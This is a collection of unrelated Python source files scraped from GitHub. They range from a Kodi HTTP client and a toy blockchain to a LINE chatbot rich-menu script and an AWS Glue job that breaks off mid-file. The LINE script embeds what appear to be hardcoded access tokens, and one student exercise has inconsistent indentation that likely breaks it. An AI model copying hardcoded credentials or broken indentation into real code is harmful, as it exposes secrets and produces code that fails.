+{"seq_id":"70038386467","text":"# -*- coding: utf-8 -*-\nimport os\nimport json\nimport urllib2\nimport logging\nimport cookielib\nfrom urllib import urlencode\n\n__all__ = ['HTTPClient']\n\n\nclass HTTPClient(object):\n\n def __init__(self, base_url='', cookiefile=None, headers=None):\n super(HTTPClient, self).__init__()\n self._log = logging.getLogger('funimation')\n self.base_url = base_url\n self.cookiefile = cookiefile\n self._cookiejar = cookielib.LWPCookieJar(self.cookiefile)\n\n try:\n if self.cookiefile is not None:\n # make sure the cookie files directory exists\n if not os.path.exists(os.path.dirname(self.cookiefile)):\n os.makedirs(os.path.dirname(self.cookiefile))\n else:\n self._cookiejar.load()\n except IOError:\n # files doesn't exist yet. this is normal if the cookie was\n # cleared or it's the first time running.\n self._log.debug('cookie file \"%s\" does not exist.',\n self.cookiefile)\n\n cookie_handler = urllib2.HTTPCookieProcessor(self._cookiejar)\n self.opener = urllib2.build_opener(cookie_handler)\n\n if headers is not None:\n self.opener.addheaders = headers\n\n def get(self, url, query=None):\n if query is not None:\n if isinstance(query, dict):\n q = dict((k, v) for k, v in query.iteritems() if v is not None)\n url = url + '?' + urlencode(q)\n else:\n url = url + '?' + query\n return self._request(self._build_request(url))\n\n def post(self, url, data):\n return self._request(self._build_request(url, data))\n\n def get_cookie(self, name):\n for x in self._cookiejar:\n if x.name == name:\n return x\n return None\n\n def save_cookies(self):\n self._log.debug('Saving cookie to \"%s\"', self._cookiejar.filename)\n self._cookiejar.save()\n\n def _request(self, request):\n content = self.opener.open(request)\n if self.cookiefile:\n self.save_cookies()\n\n if content.info()['content-type'] == 'application/json':\n content = json.load(content, 'utf-8')\n else:\n content = content.read()\n\n return content\n\n def _build_request(self, url, data=None):\n if not url.startswith('http'):\n url = self.base_url + url\n if data is not None:\n if isinstance(data, dict):\n req = urllib2.Request(url, json.dumps(data),\n {'Content-Type': 'application/json'})\n else:\n req = urllib2.Request(url, data)\n else:\n req = urllib2.Request(url)\n self._log.info(req.get_full_url())\n return req\n","repo_name":"afrase/plugin.video.funimation","sub_path":"resources/lib/funimation/httpclient.py","file_name":"httpclient.py","file_ext":"py","file_size_in_byte":2825,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"70"}
+{"seq_id":"5966994770","text":"import okKey\n\nimport os\nimport json\nfrom datetime import datetime, timedelta\nimport base64\n\nclass okBlock(object):\n def __init__(self):\n self.previousHash = \" \"\n self.blockBody = [ {\n 'sender': \"atThe\",\n 'recipient': \"Beginning\",\n 'contents': \"LetThereBeLight\",\n 'note': \"noTransactionsOnGenesisBlock\"\n } ]\n\n def addBlock(self, preBlkHash):\n self.previousHash = preBlkHash\n blockHead = {\n 'previousHash' : preBlkHash,\n 'blockBody' : self.blockBody\n }\n notify = self.blockBody\n self.blockBody = []\n return blockHead, \\\n base64.b64encode(\n okKey.getHash(\n json.dumps(blockHead,\n ensure_ascii=False, sort_keys=True).encode())).decode()\n\n def addTransaction(self, sender, recipient, contents, note):\n transaction = {\n 'sender': sender,\n 'recipient': recipient,\n 'contents': contents,\n 'note': note\n }\n self.blockBody.append(transaction)\n return base64.b64encode(\n okKey.getHash(\n json.dumps(transaction,\n ensure_ascii=False, sort_keys=True).encode())).decode()\n\n\nclass okNode(object):\n def __init__(self):\n self.waitingList = {}\n self.blockList = []\n self.blockChain = {}\n self.myBlock = okBlock()\n self.previousBlockHash = \\\n base64.b64encode(okKey.getHash(os.urandom(64))).decode()\n self.addBlock()\n\n @property\n def block(self):\n return self.myBlock\n\n def addBlock(self):\n blockHead, currentBlockHash = self.myBlock.addBlock(self.previousBlockHash)\n self.previousBlockHash = currentBlockHash\n self.blockList.append(blockHead)\n self.blockChain[currentBlockHash] = blockHead # file mapping\n for fixedTransaction in blockHead['blockBody']:\n tID = base64.b64encode(\n okKey.getHash(\n json.dumps(fixedTransaction,\n ensure_ascii=False, sort_keys=True).encode())).decode()\n if tID in self.waitingList:\n self.waitingList[tID]['blockHash'] = currentBlockHash\n else:\n if fixedTransaction['note'] != \"noTransactionsOnGenesisBlock\":\n print('error #1004')\n return currentBlockHash\n\n def depositTransaction(self, sender, recipient, contents, note):\n tID = self.block.addTransaction(sender, recipient, contents, note)\n # print('deposit tID {0}'.format(tID))\n self.waitingList[tID] = {'sender' : sender, 'blockHash' : ' '}\n return tID\n\n def vouchHash(self, tID):\n # print('Vouch tID: {0}'.format(tID))\n # print(self.waitingList)\n if tID in self.waitingList.keys():\n if self.waitingList[tID]['blockHash'] != ' ':\n waiting = self.waitingList.pop(tID)\n return waiting['blockHash']\n else:\n return 'Not approved'\n return 'Invalid Transactiom ID'\n\n def dumpBlocks(self):\n myBlock = { \"Block Cahin\" : self.blockChain }\n return json.dumps(myBlock)\n\n def dumpList(self):\n myBlock = { \"Block List\" : self.blockList }\n return json.dumps(myBlock)\n\n def dumpWaitingList(self):\n myBlock = { \"Waiting List\" : self.waitingList }\n return json.dumps(myBlock)\n\n# error #1004 : unknown transaction on notification\n\n\nclass colleague(object):\n def __init__(self):\n self.key = okKey.getKey()\n self.ID = okKey.getPubID(self.key)\n self.waitingList = []\n self.history = {}\n\n @property\n def id(self):\n return self.ID\n\n def getDepositID(self, voucher):\n self.waitingList.append(voucher)\n\n def getVoucher(self, node):\n message = ['Not approved', 'Invalid Transactiom ID']\n for tID in self.waitingList:\n hash = node.vouchHash(tID)\n #print('voucher handler tID: {0} BlockHash: {1}'.format(tID, hash))\n if hash not in message:\n self.history[tID] = hash\n self.waitingList.remove(tID)\n\n def dumpList(self):\n wList = { \"Colleague ID\": self.ID,\n \"Colleague Waiting List\" : self.waitingList }\n return json.dumps(wList)\n\n def dumpHistory(self):\n hList = { \"Colleague ID\": self.ID,\n \"Transaction History\" : self.history }\n return json.dumps(hList)\n\n# error #3003 :\n\n\nif __name__ == '__main__':\n myNode = okNode()\n print(myNode.dumpBlocks())\n print(myNode.dumpList())\n\n aColleague = colleague()\n bColleague = colleague()\n cColleague = colleague()\n\n aColleague.getDepositID(myNode.depositTransaction(\n aColleague.id, bColleague.id, \"with love\", \"letter\"))\n aColleague.getDepositID(myNode.depositTransaction(\n aColleague.id, cColleague.id, \"with\", \"head\"))\n bColleague.getDepositID(myNode.depositTransaction(\n bColleague.id, cColleague.id, \"me\", \"you\"))\n print(aColleague.dumpList())\n print(bColleague.dumpList())\n print(cColleague.dumpList())\n print(myNode.dumpWaitingList())\n myNode.addBlock() # <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\n print(myNode.dumpBlocks())\n aColleague.getVoucher(myNode)\n bColleague.getVoucher(myNode)\n cColleague.getVoucher(myNode)\n print(aColleague.dumpHistory())\n print(bColleague.dumpHistory())\n print(cColleague.dumpHistory())\n\n cColleague.getDepositID(myNode.depositTransaction(\n cColleague.id, aColleague.id, \"from me\", \"to you\"))\n cColleague.getDepositID(myNode.depositTransaction(\n cColleague.id, bColleague.id, \"with love\", \"none\"))\n print(aColleague.dumpList())\n print(bColleague.dumpList())\n print(cColleague.dumpList())\n myNode.addBlock() # <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\n print(myNode.dumpBlocks())\n aColleague.getVoucher(myNode)\n bColleague.getVoucher(myNode)\n cColleague.getVoucher(myNode)\n print(aColleague.dumpHistory())\n print(bColleague.dumpHistory())\n print(cColleague.dumpHistory())\n","repo_name":"iceman67/sss","sub_path":"okCrypto/okBlock.py","file_name":"okBlock.py","file_ext":"py","file_size_in_byte":6382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"73965941666","text":"#!/usr/bin/env python\n# coding: utf-8\n#import GPUtil\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport argparse\nimport math\nimport os\nimport glob\nimport time\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets, transforms\nfrom torchvision import utils as tvutils\nfrom PIL import Image\n\nfrom scripts import utils, models\nimport trainer, tester\n\n# ############################################\n# OPTIONS\n# ############################################\nparser = argparse.ArgumentParser()\nparser.add_argument('--debug', help='Prints debug info', action='store_true')\nparser.add_argument('--agave', help='Specify whether running on AGAVE cluser', action='store_true')\n\nparser.add_argument('--ngpu', help='Specify number of GPUs to use', type=int, default=1)\nparser.add_argument('--train_gpu', help='Specify which GPU to train on | Options: [\"0\", \"1\", \"2\", ...]', default='0')\nparser.add_argument('--test_gpu', help='Specify which GPU to test/val on | Options: [\"0\", \"1\", \"2\", ...]', default='0')\nparser.add_argument('--batch_size', help='Specify number of samples in each batch iteration', type=int, default=20)\nparser.add_argument('--num_workers', help='Specify num. of workers to load images', type=int, default=0)\nparser.add_argument('--checkpoint', help='Determine checkpoint | Options: [-2: PretrainedModel, -1: Latest, 0: Restart, n: epoch(n)', type=int, default=-2)\n\nparser.add_argument('--dataset', help='Specify Dataset | Options: [\"Synthetic-COIL20\", \"diffusercam-berkeley\", \"diffcam-mini\"]', default='diffusercam-berkeley')\nparser.add_argument('--method', help='Specify training method type | Options: [\"UNet\", \"GAN\", \"WGAN\"]', default='GAN')\nparser.add_argument('--phase', help='Specify whether to train or test model | Options: [\"train\", \"test\", \"traintest\"]', default='traintest')\nparser.add_argument('--netG', help='Define Generator Architecture | Options: [\"unet\", \"ResNet\"]', default='unet')\nparser.add_argument('--netD', help='Define Discriminator Architecture | Options: [\"basic\", \"wgan\", \"cycle\"]', default='basic')\n\nparser.add_argument('--lambda_mse', help='MSELoss weight', type=float, default=1)\nparser.add_argument('--lambda_adv', help='Adversarial Loss weight', type=float, default=0.01),\n\nparser.add_argument('--lr', help='Learning Rate', type=float, default=0.0001)\nparser.add_argument('--n_epochs', help='Number of epochs to train', type=int, default=4)\nparser.add_argument('--trainG_freq', help='How often (epochs) to train generator', type=int, default=1)\nparser.add_argument('--trainD_freq', help='How often (epochs) to train discriminator', type=int, default=1)\nparser.add_argument('--print_freq', help='How many iters til stats print', type=int, default=20)\nparser.add_argument('--plot_freq', help='How often (epochs) to display plots', type=int, default=1)\nparser.add_argument('--save_freq', help='How often (epochs) to save checkpoint/results', type=int, default=1)\nargs = parser.parse_args()\n\nif args.agave:\n DATA_DIR = '/scratch/jdrego/data/' + args.dataset + '/'\nelse:\n DATA_DIR = '/home/jdrego/PycharmProjects/DATASETS/' + args.dataset + '/'\n# Specify Checkpoint and Result Directories\nCHECKPOINT_DIR = './checkpoints/'+args.method+'/'+args.dataset+'/pretrain_adv'+str(int(args.lambda_adv*100))+'/'\nRESULTS_DIR = './results/'+args.method+'/'+args.dataset+'/pretrain_adv'+str(int(args.lambda_adv*100))+'/'\n# Checks if DIR exists, if not create DIR\nutils.check_dir([CHECKPOINT_DIR, RESULTS_DIR])\n\n# Define Generator Architecture | Options: ['unet', 'ResNet']\nnet_G = args.netG #net_G = 'unet'\n# Discriminator Network Options: ['basic', 'cycle']\nnet_D = args.netD #net_D = 'basic'\n#GPUtil.showUtilization()\n# Assign GPU as device if available, else CPU\ndevice = torch.device(\"cuda:\"+args.train_gpu if (torch.cuda.is_available() and args.ngpu > 0) else \"cpu\")\nprint('Device:', device)\n#GPUtil.showUtilization()\n# ############################################\n# LOAD DATASET\n# ############################################\nif args.phase == 'train' or args.phase == 'debug_train':\n diff_loader, gt_loader, diff_val_loader, gt_val_loader = utils.load_data(DATA_DIR=DATA_DIR, batch_size=args.batch_size,\n num_workers=args.num_workers, phase=args.phase)\nelif args.phase == 'test':\n diff_test_loader, gt_test_loader = utils.load_data(DATA_DIR=DATA_DIR, batch_size=args.batch_size,\n num_workers=args.num_workers, phase=args.phase)\nelif args.phase == 'traintest':\n diff_loader, gt_loader, diff_val_loader, gt_val_loader, diff_test_loader, gt_test_loader = utils.load_data(DATA_DIR=DATA_DIR, batch_size=args.batch_size,\n num_workers=args.num_workers, phase=args.phase)\n#GPUtil.showUtilization()\n# ############################################\n# INITIALIZE/LOAD MODELS\n# ############################################\nmodel_G, model_D, opt_G, opt_D, scheduler_G, scheduler_D, losses, iter_losses, last_epoch = utils.load_models(netG=args.netG, netD=args.netD,\n chkpoint=args.checkpoint, \n learning_rate=args.lr,\n len_data=len(diff_loader.dataset),\n batch_size=args.batch_size,\n device=device, ngpu=args.ngpu,\n CHECKPOINT_DIR=CHECKPOINT_DIR)\n#GPUtil.showUtilization()\nif args.debug:\n print('GENERATOR:'); print(model_G); print('DISCRIMINATOR:'); print(model_D)\n\n\nif args.checkpoint > 0 or args.checkpoint == -1:\n utils.plot_losses(losses[:], name='epoch_loss', RESULTS_DIR=RESULTS_DIR, method=args.method)\n utils.plot_losses(iter_losses[0*len(diff_loader):], name='iter_loss', RESULTS_DIR=RESULTS_DIR, method=args.method)\n# ############################################\n# TRAIN MODEL\n# ############################################\nif args.phase == 'train' or args.phase == 'traintest' or args.phase == 'debug_train':\n model_G = trainer.train(args.method, model_G, model_D, opt_G, opt_D, scheduler_G, scheduler_D,\n diff_loader, gt_loader, diff_val_loader, gt_val_loader,\n last_epoch, args.n_epochs, args.trainG_freq, args.trainD_freq, \n args.print_freq, args.plot_freq, args.save_freq,\n args.lambda_mse, args.lambda_adv,losses, iter_losses,\n device, args.ngpu, CHECKPOINT_DIR, RESULTS_DIR)\n last_epoch += args.n_epochs\n#GPUtil.showUtilization()\n# ############################################\n# TEST MODEL\n# ############################################\nif args.phase == 'test' or args.phase == 'traintest':\n tester.test(method=args.method, model_G=model_G, model_D=model_D, diff_loader=diff_test_loader, gt_loader=gt_test_loader,\n last_epoch=last_epoch, RESULTS_DIR=RESULTS_DIR, device=device)","repo_name":"jdrego/robust-lensless-reconstruction","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":7511,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"70"}
+{"seq_id":"10699194506","text":"from app import app, db\nfrom app.models import Map, MapNodeType, MapNode, User, Role\nfrom flask import flash, redirect, url_for\nfrom functools import wraps\nfrom datetime import datetime\nfrom flask_login import current_user\nfrom sqlalchemy import and_, not_, or_\nfrom werkzeug import secure_filename\nimport os\n\n# @map_admin_required decorater, use AFTER login_required\ndef map_admin_required(f):\n @wraps(f)\n def decorated_function(*args, **kwargs):\n if not current_user.is_map_admin():\n flash(\"You need to be a map admin to perform this action.\", \"danger\")\n return redirect(url_for(\"index\"))\n return f(*args, **kwargs)\n return decorated_function\n\n# find the best available file name for a map node type image\ndef map_node_filename(filename_from_form):\n filename = secure_filename(filename_from_form)\n\n counter = 1\n while os.path.isfile(os.path.join(app.config[\"MAPNODES_DIR\"], filename)):\n split = filename.rsplit(\".\", 1)\n\n # fancy duplication avoidance (tm)\n filename = split[0] + \"-\" + str(counter) + \".\" + split[1]\n counter += 1\n\n return filename\n\n# generate choices for the node type SelectField\ndef gen_node_type_choices():\n choices = [(0, \"choose...\")]\n\n node_types = MapNodeType.query.all()\n\n for node_type in node_types:\n choices.append((node_type.id, node_type.name))\n\n return choices\n\n# generate choices for the submap field\ndef gen_submap_choices(zerochoice=\"*no submap*\"):\n choices = [(0, zerochoice)]\n\n maps = Map.query.all()\n\n for map_ in maps:\n if map_.is_visible:\n choices.append((map_.id, map_.name))\n else:\n choices.append((map_.id, \"(invisible) {0}\".format(map_.name)))\n\n return choices\n\n# get all nodes that are visible for the current user\ndef get_visible_nodes(map_id):\n if current_user.has_admin_role():\n nodes = MapNode.query\n elif current_user.is_map_admin():\n admins = User.query.filter(User.roles.contains(Role.query.get(1)))\n admin_ids = [a.id for a in admins]\n nodes = MapNode.query.filter(not_(and_(MapNode.is_visible == False, MapNode.created_by_id.in_(admin_ids))))\n else:\n nodes = MapNode.query.filter(or_(MapNode.is_visible == True, MapNode.created_by_id == current_user.id))\n\n return nodes.filter_by(on_map=map_id).all()\n\n# get all nodes that are associated with the specified wiki article\ndef get_nodes_by_wiki_id(w_id):\n if current_user.has_admin_role():\n nodes = MapNode.query\n elif current_user.is_map_admin():\n admins = User.query.filter(User.roles.contains(Role.query.get(1)))\n admin_ids = [a.id for a in admins]\n nodes = MapNode.query.filter(not_(and_(MapNode.is_visible == False, MapNode.created_by_id.in_(admin_ids))))\n else:\n nodes = MapNode.query.filter(or_(MapNode.is_visible == True, MapNode.created_by_id == current_user.id))\n\n nodes = nodes.filter_by(wiki_entry_id = w_id).all()\n\n return nodes\n\n# set the last update time for a map\ndef map_changed(id):\n m = Map.query.get(id)\n\n if m != None:\n m.last_change = datetime.utcnow()\n\n db.session.commit()","repo_name":"kartoffelus/archivar","sub_path":"app/map/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":3166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"70"}
+{"seq_id":"19731810930","text":"\"\"\"Programa 5_21.py \nDescrição: Reescrever programa listagem 5_14 de forma a continuar executando até que o valor digitado seja 0\nAutor:Cláudio Schefer\nData: \nVersão: 001\n\"\"\"\n\n# Declaração de variáveis\n\nvalor = int(0)\ncédulas = int(0)\natual = int(0)\nsaldo_a_pagar = int(0)\n\n# Entrada de dados\n\ncédulas = 0\natual = 50\nsaldo_a_pagar = valor\n\n\n# Processamento e Saída de dados\n\nwhile True:\n valor = int(input(\"Digite o valor a pagar:\"))\n if valor == 0:\n break\n cédulas = 0\n atual = 50\n saldo_a_pagar = valor\n\n while True:\n \tif atual <= saldo_a_pagar:\n \tsaldo_a_pagar -= atual\n \tcédulas += 1\n \telse:\n \tprint(\"%d cédula(s) de R$%d\" % (cédulas, atual))\n \tif saldo_a_pagar == 0:\n \t\tbreak\n \tif atual == 50:\n \t\tatual = 20\n \telif atual == 20:\n \t\tatual = 10\n \telif atual == 10:\n \t\tatual = 5\n\t \telif atual == 5:\n \t\tatual = 1\n \tcédulas = 0\n\n\n\n","repo_name":"profnssorg/claudioSchefer1","sub_path":"5_21.py","file_name":"5_21.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"27670501266","text":"from django.test import TestCase\nfrom .models import *\nfrom django.contrib.auth.models import User\n\n# Create your tests here.\n\n\nclass TaskTest(TestCase):\n\n def setUp(self):\n self.user = User.objects.create(id=1, username='k')\n self.task = Task.objects.create(id=1,\n creater=self.user,\n start='13:00',\n end='14:00',\n date='2019-06-25',\n Done='NO')\n\n def test_instance(self):\n self.assertTrue(isinstance(self.task,Task))\n\n\n def test_save_task(self):\n self.task.save()\n task = Task.objects.all()\n self.assertTrue(len(task)>0)\n\n def test_delete_task(self):\n self.task.delete()\n task = Task.objects.all()\n self.assertTrue(len(task)==0)\n","repo_name":"odipojames/Softsearch","sub_path":"app/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"2361289334","text":"import requests\nimport json\nfrom linebot import (\n LineBotApi, WebhookHandler\n)\nfrom linebot.exceptions import (\n InvalidSignatureError\n)\n\nclass RichMenu:\n def __init__(self):\n\n self.headers = {\"Authorization\": \"Bearer 0123456789f0/NwnXZLq5EzaCZc6IJpbxJxR7chgVpU8LQe6VPau8RGfslcxcWeC4rIGOl606sZsWkkAJmzNn+li/QVHDF9h12zVxeqPbb06Tkapffs4uKgHYepd+TdUQCPnAE0jMVhJqXPbmgdB04t89/1O/w1cDnyilFU=\",\n \"Content-Type\": \"application/json\"}\n # Channel Access Token\n self.line_bot_api = LineBotApi('0123456789f0/f0/NwnXZLq5EzaCZc6IJpbxJxR7chgVpU8LQe6VPau8RGfslcxcWeC4rIGOl606sZsWkkAJmzNn+li/QVHDF9h12zVxeqPbb06Tkapffs4uKgHYepd+TdUQCPnAE0jMVhJqXPbmgdB04t89/1O/w1cDnyilFU=')\n\n # 每執行一次 就會建立一次Rich Menu\n def CreateMenu(self):\n body = {\n \"size\": {\n \"width\": 2500,\n \"height\": 843\n },\n \"selected\": \"true\",\n \"name\": \"Controller\",\n \"chatBarText\": \"選單\",\n \"areas\": [\n {\n \"bounds\": {\n \"x\": 6,\n \"y\": 325,\n \"width\": 1251,\n \"height\": 490\n },\n \"action\": {\n \"type\": \"uri\",\n \"uri\": \"https://running-flow-estimate.herokuapp.com/\"\n }\n },\n {\n \"bounds\": {\n \"x\": 1264,\n \"y\": 325,\n \"width\": 1235,\n \"height\": 490\n },\n \"action\": {\n \"type\": \"uri\",\n \"uri\": \"http://countpersonvm.australiacentral.cloudapp.azure.com\"\n }\n }\n ]\n }\n req = requests.request('POST', 'https://api.line.me/v2/bot/richmenu',\n headers=self.headers,data=json.dumps(body).encode('utf-8'))\n richmenuid = json.loads(req.text)\n print(richmenuid)\n return richmenuid[\"richMenuId\"]\n\n # 將圖片上傳 JPG, Size: 2500 * 843 or 2500 * 1686\n # 上傳一次即可,若要更新圖片則帶入 RichMenu Id與新圖片\n def UpRichMenuPhoto(self, richmenuid, imgfile):\n #richmenuid = 'richmenu-1fb28d08ef53bd89fedae13887654321'\n\n try:\n with open(imgfile, 'rb') as f:\n print(richmenuid, ' ', imgfile)\n self.line_bot_api.set_rich_menu_image(richmenuid, \"image/jpeg\", f)\n f.close()\n return True\n except Exception as e:\n print(e)\n return False\n\n # 啟動 rich menu\n def RichMenuEable(self, rich_menu_id):\n richmenuweb = 'https://api.line.me/v2/bot/user/all/richmenu/' + str(rich_menu_id)\n req = requests.request('POST', richmenuweb, headers=self.headers)\n data = json.loads(req.text)\n print(data)\n if bool(data):\n print('Response Info:', data)\n return False\n else:\n print('Response Info:', data)\n return True\n\n # 查看所有 RichMenuList\n def GetRichMenuList(self):\n rich_menu_list = self.line_bot_api.get_rich_menu_list()\n rlist = []\n for rich_menu in rich_menu_list:\n #print(rich_menu.rich_menu_id)\n rlist.append(rich_menu.rich_menu_id)\n return rlist\n\n\n # 刪除 RichMenuList\n def DelRichMenuList(self, rich_menu_id):\n self.line_bot_api.delete_rich_menu(str(rich_menu_id))\n rlist = self.GetRichMenuList()\n return rlist\n\nif __name__=='__main__':\n rm = RichMenu()\n print(rm.GetRichMenuList())\n","repo_name":"3probedata/linechatbotAPP","sub_path":"richmenu.py","file_name":"richmenu.py","file_ext":"py","file_size_in_byte":3702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"58912950","text":"import sys\nimport os\nfrom PIL import Image\n\n\ndef convert(source, dest='png'):\n \"\"\"\n converts jpeg files from source directory to png in dest directory\n \"\"\"\n dest_path = os.path.join(os.getcwd(), dest)\n os.makedirs(dest_path, exist_ok=True)\n source_path = os.path.join(os.getcwd(), source)\n for file in os.listdir(source_path):\n if os.path.isfile(os.path.join(source_path, file)):\n if file.lower().endswith('jpeg') or file.lower().endswith('jpg'):\n img = Image.open(os.path.join(source_path, file))\n f, e = file.split('.')\n dest_file_name = os.path.join(dest_path, f + '.png')\n img.save(dest_file_name, 'png')\n\n\nif __name__ == '__main__':\n source_folder = os.getcwd()\n try:\n source_folder = sys.argv[1]\n dest_folder = sys.argv[2]\n except IndexError:\n print(f'1 or 2 paths not given - converting from {source_folder} to png directory')\n try:\n convert(source_folder, dest_folder)\n except NameError:\n convert(source_folder)\n","repo_name":"evgenyrinkevich/Image_Processing","sub_path":"JPEGtoPNGconverter.py","file_name":"JPEGtoPNGconverter.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"41332578177","text":"from turtle import title\nimport openpyxl\nfrom html_utils import get_background\nfrom test_pages.files import test_pages\nfrom bs4 import BeautifulSoup, ResultSet, Tag\nfrom openpyxl.styles import PatternFill, Border, Side, Alignment, Font\nfrom openpyxl.worksheet.worksheet import Worksheet\nfrom openpyxl.workbook.workbook import Workbook\nfrom openpyxl.cell.cell import Cell\nfrom openpyxl.utils.dataframe import dataframe_to_rows\n\nfrom utils.excel import delete_empty_columns, fit_column_width, is_merged_cell, set_value\n\nPARSER = \"html5lib\"\n\n\ndef format_sheet(sheet: Worksheet):\n first_row = 4\n last_col = sheet.max_column\n\n sheet.row_dimensions[first_row].height = 120 # type:ignore\n\n first_cell = sheet['A4']\n first_cell.alignment = Alignment(\n vertical='center', horizontal='left', wrap_text=True)\n\n for row in sheet.iter_rows(min_row=first_row):\n for c in row:\n cell: Cell = c\n if cell.column == last_col:\n sheet.merge_cells(start_row=cell.row, end_row=cell.row,\n start_column=last_col, end_column=last_col+3)\n for row in sheet.iter_rows(min_row=first_row):\n for c in row:\n cell: Cell = c\n cell.border = Border(left=Side(style='thin'),\n right=Side(style='thin'),\n top=Side(style='thin'),\n bottom=Side(style='thin'))\n\n fit_column_width(sheet, 'B')\n fit_column_width(sheet, 'C')\n\n\ndef write_to_sheet(sheet: Worksheet, html_table: ResultSet[Tag]):\n for tr_i, tr in enumerate(html_table, start=1):\n col_i = 1\n for td in tr.find_all('td'):\n cell: Cell = sheet.cell(row=tr_i, column=col_i)\n text = td.get_text(strip=True)\n if tr_i == 4 and col_i == 1:\n text = td.get_text(separator='\\n', strip=True).splitlines()\n text = \"\\n\".join(text[:-1])\n if not is_merged_cell(sheet, cell):\n set_value(cell, text)\n if td.get('colspan'):\n span = int(td.get('colspan'))\n col_i += span\n sheet.merge_cells(start_row=cell.row, end_row=cell.row,\n start_column=cell.column, end_column=cell.column+(span-1))\n cell.alignment = Alignment(\n horizontal='center', vertical='center')\n else:\n col_i += 1\n\n # Add background color if any\n bg_color = openpyxl.styles.PatternFill( # type: ignore\n start_color=get_background(td), end_color=get_background(td), fill_type=\"solid\")\n cell.fill = bg_color\n format_sheet(sheet)\n\n\ndef html_to_excel():\n workbook = Workbook()\n sheet: Worksheet = workbook.active\n\n with open(test_pages(\"graderesult.php.html\")) as file:\n html = file.read()\n soup = BeautifulSoup(html, PARSER)\n table = soup.select('.ewReportTable tr')\n write_to_sheet(sheet, table)\n\n workbook.save(\"data.xlsx\")\n\n\ndef main():\n html_to_excel()\n\n\nif __name__ == '__main__':\n print(main())\n","repo_name":"limkokwing-projects/result-remarks","sub_path":"test_two.py","file_name":"test_two.py","file_ext":"py","file_size_in_byte":3198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"9216014586","text":"import sys\r\nfrom awsglue.transforms import *\r\nfrom awsglue.utils import getResolvedOptions\r\nfrom pyspark.context import SparkContext\r\nfrom awsglue.context import GlueContext\r\nfrom awsglue.job import Job\r\nimport pyspark.sql.functions as F\r\nfrom awsglue.dynamicframe import DynamicFrame\r\nfrom pyspark.sql.window import Window\r\nimport uuid\r\nfrom datetime import datetime\r\ncurrent_date = datetime.now().strftime(\"%Y-%m-%d\")\r\n\r\nargs = getResolvedOptions(sys.argv, [\"JOB_NAME\",\"file_path\",\"key\"])\r\nsc = SparkContext()\r\nglueContext = GlueContext(sc)\r\nspark = glueContext.spark_session\r\njob = Job(glueContext)\r\njob.init(args[\"JOB_NAME\"], args)\r\nfile_path=args[\"file_path\"]\r\n# Script generated for node S3 bucket\r\nS3bucket_node1 = glueContext.create_dynamic_frame.from_options(\r\n format_options={},\r\n connection_type=\"s3\",\r\n format=\"avro\",\r\n connection_options={\r\n \"paths\": [args[\"file_path\"]],\r\n \"recurse\": True,\r\n },\r\n transformation_ctx=\"S3bucket_node1\",\r\n)\r\ndf = S3bucket_node1.toDF()\r\n\r\nimport boto3\r\n\r\n# Define the source and destination paths\r\nsource_bucket = \"groupno6\"\r\nsource_key = args[\"key\"]\r\nnames=source_key.split(\"/\")\r\ndestination_bucket = \"groupno6\"\r\ndestination_key = f\"aws-project-2/archive/{names[-1]}\"\r\n\r\n# Create a new S3 client using the default AWS credentials\r\ns3_client = boto3.client(\"s3\")\r\n\r\n# Copy the file from the source to the destination\r\ns3_client.copy_object(\r\n Bucket=destination_bucket,\r\n Key=destination_key,\r\n CopySource={\r\n \"Bucket\": source_bucket,\r\n \"Key\": source_key\r\n }\r\n)\r\n\r\n# Delete the file from the source folder\r\ns3_client.delete_object(\r\n Bucket=source_bucket,\r\n Key=source_key\r\n)\r\n\r\ndef generate_unique_id():\r\n unique_id = str(uuid.uuid4().int)[:5]\r\n unique_id = int(unique_id)\r\n return unique_id\r\n\r\n# Example usage\r\nid_int = generate_unique_id()\r\n# Perform the operations and create the final DataFrame\r\nwindow = Window.orderBy(F.lit(1)) \r\n\r\n# Unbounded window specification\r\nresult_df = df.selectExpr(\r\n 'concat(\"DIS_\", Tran_ref_id) AS voucher_code',\r\n '\"C\" AS txn_type',\r\n '1 AS source_system_id',\r\n 'date_format(to_date(Transaction_dt, \"dd-MMM-yy\"), \"yyyy-MM-dd\") AS txn_date',\r\n 'Tran_ref_id AS source_system_txn_id',\r\n 'explode(array(concat(\"A101 \", amt), concat(\"A104 \", gst), concat(\"A105 \", custom_duty))) AS txn_amt'\r\n).select(\r\n F.concat(F.lit(id_int),F.row_number().over(window)).cast(\"integer\").alias(\"txn_id\"),\r\n F.col(\"voucher_code\"),\r\n F.col(\"txn_type\"),\r\n F.col(\"txn_date\"),\r\n F.split(\"txn_amt\", \" \")[0].alias(\"acc_no\"),\r\n F.split(\"txn_amt\", \" \")[1].alias(\"txn_amt\"),\r\n F.lit(1).alias(\"source_system_id\"),\r\n F.col(\"source_system_txn_id\")\r\n)\r\n\r\n\r\nfailed_df = result_df.filter(F.col(\"txn_date\") > current_date)\r\nresult_df = result_df.filter(F.col(\"txn_date\") <= current_date)\r\n\r\nfailed_dynamic_frame = DynamicFrame.fromDF(failed_df, glueContext, \"failed_dynamic_frame\")\r\noutput_dynamic_frame = DynamicFrame.fromDF(result_df, glueContext, \"output_dynamic_frame\")\r\n\r\n# Script generated for node S3 